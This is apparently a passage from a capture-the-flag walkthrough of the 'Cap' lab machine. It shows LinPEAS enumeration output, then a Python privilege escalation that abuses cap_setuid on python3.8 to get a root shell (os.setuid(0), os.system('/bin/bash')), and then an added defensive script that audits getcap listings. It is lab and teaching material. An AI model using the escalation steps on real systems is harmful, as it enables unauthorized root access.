/etc/ld.so.conf
Content of /etc/ld.so.conf:
include /etc/ld.so.conf.d/*.conf
/etc/ld.so.conf.d
/etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
- /usr/lib/x86_64-linux-gnu/libfakeroot
/etc/ld.so.conf.d/libc.conf
- /usr/local/lib
/etc/ld.so.conf.d/x86_64-linux-gnu.conf
- /usr/local/lib/x86_64-linux-gnu
- /lib/x86_64-linux-gnu
- /usr/lib/x86_64-linux-gnu
/etc/ld.so.preload
╔══════════╣ Capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
══╣ Current shell capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=
══╣ Parent process capabilities
CapInh: 0x0000000000000000=
CapPrm: 0x0000000000000000=
CapEff: 0x0000000000000000=
CapBnd: 0x0000003fffffffff=cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
CapAmb: 0x0000000000000000=
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
╔══════════╣ Users with capabilities
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities
╔══════════╣ AppArmor binary profiles
-rw-r--r-- 1 root root 3222 Mar 11 2020 sbin.dhclient
-rw-r--r-- 1 root root 3202 Feb 25 2020 usr.bin.man
-rw-r--r-- 1 root root 26703 Feb 2 2021 usr.lib.snapd.snap-confine.real
-rw-r--r-- 1 root root 1575 Feb 11 2020 usr.sbin.rsyslogd
-rw-r--r-- 1 root root 1385 Dec 7 2019 usr.sbin.tcpdump
╔══════════╣ Files with ACLs (limited to 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#acls
files with acls in searched folders Not Found
╔══════════╣ Files (scripts) in /etc/profile.d/
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#profiles-files
total 36
drwxr-xr-x 2 root root 4096 May 23 2021 .
drwxr-xr-x 92 root root 4096 Jul 23 2021 ..
-rw-r--r-- 1 root root 96 Dec 5 2019 01-locale-fix.sh
-rw-r--r-- 1 root root 1557 Feb 17 2020 Z97-byobu.sh
-rw-r--r-- 1 root root 833 Feb 2 2021 apps-bin-path.sh
-rw-r--r-- 1 root root 729 Feb 2 2020 bash_completion.sh
-rw-r--r-- 1 root root 1003 Aug 13 2019 cedilla-portuguese.sh
-rw-r--r-- 1 root root 1107 Nov 3 2019 gawk.csh
-rw-r--r-- 1 root root 757 Nov 3 2019 gawk.sh
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#init-init-d-systemd-and-rc-d
═╣ Hashes inside passwd file? ........... No
═╣ Writable passwd file? ................ No
═╣ Credentials in fstab/mtab? ........... No
═╣ Can I read shadow files? ............. No
═╣ Can I read shadow plists? ............ No
═╣ Can I write shadow plists? ........... No
═╣ Can I read opasswd file? ............. No
═╣ Can I write in network-scripts? ...... No
═╣ Can I read root folder? .............. No
╔══════════╣ Searching root files in home dirs (limit 30)
/home/
/home/nathan/.bash_history
/home/nathan/.viminfo
/root/
/var/www
/var/www/html/templates
/var/www/html/templates/index.html
/var/www/html/upload
/var/www/html/upload/0.pcap
/var/www/html/static
/var/www/html/static/js
/var/www/html/static/js/plugins.js
/var/www/html/static/js/scripts.js
/var/www/html/static/js/bar-chart.js
/var/www/html/static/js/metisMenu.min.js
/var/www/html/static/js/jquery.slimscroll.min.js
/var/www/html/static/js/vendor
/var/www/html/static/js/vendor/jquery-2.2.4.min.js
/var/www/html/static/js/vendor/modernizr-2.8.3.min.js
/var/www/html/static/js/bootstrap.min.js
/var/www/html/static/js/jquery.slicknav.min.js
/var/www/html/static/js/pie-chart.js
/var/www/html/static/js/line-chart.js
/var/www/html/static/js/popper.min.js
/var/www/html/static/js/owl.carousel.min.js
/var/www/html/static/js/maps.js
/var/www/html/static/css
/var/www/html/static/css/bootstrap.min.css
/var/www/html/static/css/typography.css
/var/www/html/static/css/default-css.css
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
-rw-r--r-- 1 root root 9935 May 15 2021 0.pcap
-rw-r--r-- 1 root root 19985 May 20 2021 index.html
-rw-r--r-- 1 tcpdump tcpdump 24 Apr 7 03:25 3.pcap
-rw-r--r-- 1 tcpdump tcpdump 24 Apr 7 04:00 1.pcap
-rw-r--r-- 1 tcpdump tcpdump 846 Apr 7 04:00 2.pcap
drwxr-xr-x 2 root root 4096 May 23 2021 css
drwxr-xr-x 2 root root 4096 May 23 2021 fonts
drwxr-xr-x 3 root root 4096 May 23 2021 js
drwxr-xr-x 9 root root 4096 May 23 2021 images
total 16
total 20
total 24
╔══════════╣ Readable files belonging to root and readable by me but not world readable
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/nathan
/run/lock
/run/screen
/run/user/1001
/run/user/1001/dbus-1
/run/user/1001/dbus-1/services
/run/user/1001/gnupg
/run/user/1001/inaccessible
/run/user/1001/systemd
/run/user/1001/systemd/transient
/run/user/1001/systemd/units
/snap/core18/2066/tmp
/snap/core18/2066/var/tmp
/snap/core18/2074/tmp
/snap/core18/2074/var/tmp
/tmp
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/.X11-unix
/tmp/.XIM-unix
/tmp/.font-unix
#)You_can_write_even_more_files_inside_last_directory
/var/crash
/var/tmp
/var/www/html
/var/www/html/__pycache__
/var/www/html/__pycache__/app.cpython-38.pyc
/var/www/html/app.py
╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh
/usr/bin/rescan-scsi-bus.sh
╔══════════╣ Executable files potentially added by user (limit 70)
2021-05-15+21:40:28.2491426570 /usr/local/bin/gunicorn
2021-05-15+21:40:28.2011395020 /usr/local/bin/flask
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_terminal.sh
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_keyboard.sh
2020-09-23+18:59:04.5286646640 /etc/console-setup/cached_setup_font.sh
╔══════════╣ Unexpected in root
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/home/nathan/.gnupg/pubring.kbx
/home/nathan/.gnupg/trustdb.gpg
/home/nathan/snap/lxd/common/config/config.yml
/var/log/syslog
/var/log/journal/06774f23bd654b25a296a616308d2acd/user-1001.journal
/var/log/journal/06774f23bd654b25a296a616308d2acd/system.journal
/var/log/kern.log
/var/log/auth.log
╔══════════╣ Writable log files (logrotten) (limit 50)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#logrotate-exploitation
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
╔══════════╣ Files inside /home/nathan (limit 20)
total 36
drwxr-xr-x 5 nathan nathan 4096 Apr 7 05:08 .
drwxr-xr-x 3 root root 4096 May 23 2021 ..
lrwxrwxrwx 1 root root 9 May 15 2021 .bash_history -> /dev/null
-rw-r--r-- 1 nathan nathan 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 nathan nathan 3771 Feb 25 2020 .bashrc
drwx------ 2 nathan nathan 4096 May 23 2021 .cache
drwx------ 3 nathan nathan 4096 Apr 7 05:08 .gnupg
-rw-r--r-- 1 nathan nathan 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 May 27 2021 .viminfo -> /dev/null
drwxr-xr-x 3 nathan nathan 4096 Apr 7 05:07 snap
-r-------- 1 nathan nathan 33 Apr 7 02:17 user.txt
╔══════════╣ Files inside others home (limit 20)
/var/www/html/app.py
/var/www/html/templates/index.html
/var/www/html/__pycache__/app.cpython-38.pyc
/var/www/html/upload/0.pcap
/var/www/html/upload/1.pcap
/var/www/html/upload/2.pcap
/var/www/html/upload/3.pcap
/var/www/html/static/js/plugins.js
/var/www/html/static/js/scripts.js
/var/www/html/static/js/bar-chart.js
/var/www/html/static/js/metisMenu.min.js
/var/www/html/static/js/jquery.slimscroll.min.js
/var/www/html/static/js/vendor/jquery-2.2.4.min.js
/var/www/html/static/js/vendor/modernizr-2.8.3.min.js
/var/www/html/static/js/bootstrap.min.js
/var/www/html/static/js/jquery.slicknav.min.js
/var/www/html/static/js/pie-chart.js
/var/www/html/static/js/line-chart.js
/var/www/html/static/js/popper.min.js
/var/www/html/static/js/owl.carousel.min.js
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 2756 Feb 13 2020 /usr/share/man/man8/vgcfgbackup.8.gz
-rw-r--r-- 1 root root 11886 May 23 2021 /usr/share/info/dir.old
-rw-r--r-- 1 root root 392817 Feb 9 2020 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 7867 Jul 16 1996 /usr/share/doc/telnet/README.old.gz
-rwxr-xr-x 1 root root 226 Feb 17 2020 /usr/share/byobu/desktop/byobu.desktop.old
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-80/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 0 Apr 14 2021 /usr/src/linux-headers-5.4.0-73-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Apr 14 2021 /usr/src/linux-headers-5.4.0-73-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 237862 Apr 14 2021 /usr/src/linux-headers-5.4.0-73-generic/.config.old
-rw-r--r-- 1 root root 0 Jul 9 2021 /usr/src/linux-headers-5.4.0-80-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 0 Jul 9 2021 /usr/src/linux-headers-5.4.0-80-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 237862 Jul 9 2021 /usr/src/linux-headers-5.4.0-80-generic/.config.old
-rwxr-xr-x 1 root root 1086 Nov 25 2019 /usr/src/linux-headers-5.4.0-73/tools/testing/selftests/net/tcp_fastopen_backup_key.sh
-rw-r--r-- 1 root root 1403 May 23 2021 /usr/lib/python3/dist-packages/sos/report/plugins/__pycache__/ovirt_engine_backup.cpython-38.pyc
-rw-r--r-- 1 root root 1775 Feb 25 2021 /usr/lib/python3/dist-packages/sos/report/plugins/ovirt_engine_backup.py
-rw-r--r-- 1 root root 9833 Jul 9 2021 /usr/lib/modules/5.4.0-80-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Jul 9 2021 /usr/lib/modules/5.4.0-80-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 9833 Apr 14 2021 /usr/lib/modules/5.4.0-73-generic/kernel/drivers/power/supply/wm831x_backup.ko
-rw-r--r-- 1 root root 9073 Apr 14 2021 /usr/lib/modules/5.4.0-73-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 44048 Mar 17 2021 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so
-rw-r--r-- 1 root root 2743 Jul 31 2020 /etc/apt/sources.list.curtin.old
-rw-r--r-- 1 root root 678 Apr 7 02:16 /run/blkid/blkid.tab.old
╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/command-not-found/commands.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/lib/fwupd/pending.db: SQLite 3.x database, last written using SQLite version 3031001
Found /var/www/html/static/images/icon/Thumbs.db: Composite Document File V2 Document, Cannot read section info
Found /var/www/html/static/images/icon/market-value/Thumbs.db: Composite Document File V2 Document, Cannot read section info
-> Extracting tables from /var/lib/PackageKit/transactions.db (limit 20)
-> Extracting tables from /var/lib/command-not-found/commands.db (limit 20)
-> Extracting tables from /var/lib/fwupd/pending.db (limit 20)
╔══════════╣ Web files?(output limit)
/var/www/:
total 12K
drwxr-xr-x 3 root root 4.0K May 23 2021 .
drwxr-xr-x 14 root root 4.0K May 23 2021 ..
drwxr-xr-x 6 nathan nathan 4.0K May 25 2021 html
/var/www/html:
total 32K
drwxr-xr-x 6 nathan nathan 4.0K May 25 2021 .
drwxr-xr-x 3 root root 4.0K May 23 2021 ..
╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 nathan nathan 220 Feb 25 2020 /home/nathan/.bash_logout
-rw-r--r-- 1 landscape landscape 0 Jul 31 2020 /var/lib/landscape/.cleanup.user
-rw-r--r-- 1 root root 220 Feb 25 2020 /etc/skel/.bash_logout
-rw------- 1 root root 0 Jul 31 2020 /etc/.pwd.lock
-rw------- 1 root root 0 Apr 7 02:16 /run/snapd/lock/.lock
-rw-r--r-- 1 root root 0 Apr 7 02:16 /run/network/.ifstate.lock
-rw------- 1 root root 0 May 7 2021 /snap/core18/2066/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 4 2018 /snap/core18/2066/etc/skel/.bash_logout
-rw------- 1 root root 0 Jun 11 2021 /snap/core18/2074/etc/.pwd.lock
-rw-r--r-- 1 root root 220 Apr 4 2018 /snap/core18/2074/etc/skel/.bash_logout
╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)
-rw-r--r-- 1 root root 51200 May 23 2021 /var/backups/alternatives.tar.0
╔══════════╣ Searching passwords in history files
╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/etc/pam.d/common-password
/usr/bin/systemd-ask-password
/usr/bin/systemd-tty-ask-password-agent
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
#)There are more creds/passwds files in the previous parent folder
/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/python3/dist-packages/keyring/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/keyring/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/credentials.py
/usr/lib/python3/dist-packages/launchpadlib/tests/__pycache__/test_credential_store.cpython-38.pyc
/usr/lib/python3/dist-packages/launchpadlib/tests/test_credential_store.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/client_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/__pycache__/resource_owner_password_credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/client_credentials.py
/usr/lib/python3/dist-packages/oauthlib/oauth2/rfc6749/grant_types/resource_owner_password_credentials.py
/usr/lib/python3/dist-packages/twisted/cred/__pycache__/credentials.cpython-38.pyc
/usr/lib/python3/dist-packages/twisted/cred/credentials.py
/usr/lib/systemd/system/multi-user.target.wants/systemd-ask-password-wall.path
/usr/lib/systemd/system/sysinit.target.wants/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.path
/usr/lib/systemd/system/systemd-ask-password-console.service
/usr/lib/systemd/system/systemd-ask-password-plymouth.path
/usr/lib/systemd/system/systemd-ask-password-plymouth.service
#)There are more creds/passwds files in the previous parent folder
/usr/share/doc/git/contrib/credential
╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs
╔══════════╣ Searching passwords inside logs (limit 70)
Binary file /var/log/journal/06774f23bd654b25a296a616308d2acd/user-1001.journal matches
[ 35.061721] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[ 36.188414] systemd[1]: Started Forward Password Requests to Wall Directory Watch.
╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════
╚════════════════╝
Regexes to search for API keys aren't activated, use param '-r'
nathan@cap:~$
From the LinPEAS output, I saw that cap_setuid is available on /usr/bin/python3.8. With that capability a process can set its own UID to 0, so we can get root simply by setting the UID to 0:
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
Let’s do this in Python:
nathan@cap:~$ python3
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:~#
root@cap:~# ls /root
root.txt
root@cap:~# cat /root/root.txt
REDACTED
We successfully set the UID to 0 and got a shell as the root user; the root flag is stored in /root/root.txt.
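The reason this box falls is a file capability, not a SUID bit, so a `find -perm -4000` audit would never have caught it. The script below is an added example (not code from this walkthrough or from LinPEAS) that reads a `getcap -r /` listing in the same "path = caps+flags" format LinPEAS prints under "Files with capabilities" and ranks each entry: a root-equivalent capability on an interpreter is critical, because any script the interpreter runs inherits it; the same capability on a single-purpose binary is high; everything else (such as cap_net_raw on ping) is informational. The `ROOT_EQUIVALENT` set and the interpreter regex are assumptions chosen for the example, not a published policy, and the sample listing is constructed from the one shown on this page. For a critical or high finding the suggested fix is `setcap -r <path>`, which strips the file capability, and then giving the service that needed it a dedicated unprivileged user instead.

```python
"""Audit a `getcap -r /` listing for privilege-escalation risk.

Added example for this walkthrough; it is not part of the original page or of
LinPEAS. It parses the "path = caps+flags" lines that getcap prints (LinPEAS
reproduces the same format under "Files with capabilities") and flags
capabilities that are root-equivalent when granted to a binary any local user
can run. The sample listing below is constructed from the one on this page.
"""
import re

# Capabilities treated as root-equivalent for this example (an assumption
# chosen for the audit, not an exhaustive policy): each lets the holder
# become uid 0, bypass DAC, or load code into the kernel.
ROOT_EQUIVALENT = {
    "cap_setuid", "cap_setgid", "cap_setfcap", "cap_chown", "cap_fowner",
    "cap_dac_override", "cap_dac_read_search",
    "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module", "cap_sys_rawio",
}

# An interpreter hands its capabilities to whatever script it runs, so a
# root-equivalent cap on one is worse than on a single-purpose binary.
INTERPRETER_RE = re.compile(r"/(python[0-9.]*|perl[0-9.]*|ruby|php[0-9.]*|node)$")

# One clause of a cap set: "cap_a,cap_b+eip" (libcap < 2.41) or "cap_a,cap_b=eip".
CLAUSE_RE = re.compile(r"^([a-z0-9_,]+)[+=]([eip]*)$")


def parse_getcap_line(line):
    """Parse one getcap line into (path, {cap_name: set(flags)}).

    Returns None for lines that are not capability entries (headers, blanks).
    Both the "path = caps" and the newer "path caps" layouts are accepted.
    """
    line = line.strip()
    if not line.startswith("/"):
        return None
    path, _, rest = line.partition(" ")
    rest = rest.lstrip("= ")
    caps = {}
    for clause in rest.split():
        m = CLAUSE_RE.match(clause)
        if not m:
            continue
        for name in m.group(1).split(","):
            caps[name] = set(m.group(2))
    return (path, caps) if caps else None


def assess(path, caps):
    """Return (severity, path, cap) findings for one binary."""
    findings = []
    interpreter = INTERPRETER_RE.search(path) is not None
    for cap, flags in caps.items():
        # Inheritable-only caps give the binary nothing unless the caller
        # already holds them, so they are not a local-privesc concern here.
        if not flags & {"e", "p"}:
            continue
        if cap in ROOT_EQUIVALENT:
            severity = "critical" if interpreter else "high"
        else:
            severity = "info"  # e.g. cap_net_raw on ping is the expected use
        findings.append((severity, path, cap))
    return findings


def audit(getcap_output):
    """Audit a whole listing; findings come back ordered critical -> info."""
    rank = {"critical": 0, "high": 1, "info": 2}
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if parsed:
            findings.extend(assess(*parsed))
    return sorted(findings, key=lambda f: (rank[f[0]], f[1], f[2]))


def remediation(finding):
    """Suggested fix for a critical/high finding: strip the file capability
    entirely with `setcap -r` and run the service as a dedicated user."""
    severity, path, _cap = finding
    if severity == "info":
        return None
    return f"setcap -r {path}"


# Constructed sample, copied from the listing in this walkthrough.
SAMPLE = """\
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE):
        fix = remediation(finding)
        print(*finding, f"-> {fix}" if fix else "")
```

Run it on a real host with `getcap -r / 2>/dev/null | python3 audit_caps.py` after swapping `SAMPLE` for `sys.stdin.read()`; on Cap it reports exactly one critical entry, `/usr/bin/python3.8` with `cap_setuid`, which is the finding LinPEAS buried in the middle of 500 lines of output.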
Source:
https://portswigger.net/web-security/access-control/idor
https://github.com/peass-ng/PEASS-ng/releases
https://precli.readthedocs.io/…/os-setuid-root/